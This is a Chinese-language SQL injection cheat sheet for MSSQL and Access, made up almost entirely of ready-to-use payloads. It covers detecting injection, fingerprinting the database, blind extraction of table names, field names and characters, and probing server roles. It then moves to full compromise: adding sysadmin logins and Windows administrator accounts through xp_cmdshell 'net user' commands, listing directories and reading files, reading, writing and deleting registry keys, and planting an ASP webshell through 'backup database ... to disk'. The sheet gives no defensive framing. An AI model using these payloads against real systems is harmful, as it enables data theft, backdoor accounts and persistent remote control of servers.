1.判断是否有注入;and 1=1 ;and 1=2
2.初步判断是否是mssql ;and user>0
3.注入参数是字符'and [查询条件] and ''='
4.搜索时没过滤参数的'and [查询条件] and '%25'='
5.判断数据库系统

;and (select count(*) from sysobjects)>0 mssql

;and (select count(*) from msysobjects)>0 access

6.猜数据库 ;and (select Count(*) from [数据库名])>0

7.猜字段 ;and (select Count(字段名) from 数据库名)>0

8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0

9.(1)猜字段的ascii值(access)

;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0

(2)猜字段的ascii值(mssql)

;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0

10.测试权限结构(mssql)

;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--

;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--

;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--

;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--

;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--

;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--

;and 1=(select IS_MEMBER('db_owner'));--

11.添加mssql和系统的帐户

;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,username,password;--

;exec master.dbo.sp_addsrvrolemember sysadmin username;--

;exec master.dbo.xp_cmdshell 'net user username password

/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';--

;exec master.dbo.xp_cmdshell 'net user username password /add';--

;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--

12.(1)遍历目录

;create table dirs(paths varchar(100), id int)

;insert dirs exec master.dbo.xp_dirtree 'c:\'

;and (select top 1 paths from dirs)>0

;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>)

(2)遍历目录

;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器

;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表

;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构

;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容

13.mssql中的存储过程

xp_regenumvalues 注册表根键, 子键

;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值

xp_regread 根键,子键,键值名

;exec xp_regread
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回指定键的值

xp_regwrite 根键,子键, 值名, 值类型, 值

值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型

;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表

xp_regdeletevalue 根键,子键,值名

exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值

xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值

14.mssql的backup创建webshell

use model

create table cmd(str image);

insert into cmd(str) values ('');

backup database model to disk='c:\l.asp';

15.mssql内置函数

;and (select @@version)>0 获得Windows的版本号

;and user_name()='dbo' 判断当前系统的连接用户是不是sa

;and (select user_name())>0 爆当前系统的连接用户

;and (select db_name())>0 得到当前连接的数据库

16.简洁的webshell

use model

create table cmd(str image);

insert into cmd(str) values ('');

backup database model to disk='g:\wwwtest\l.asp';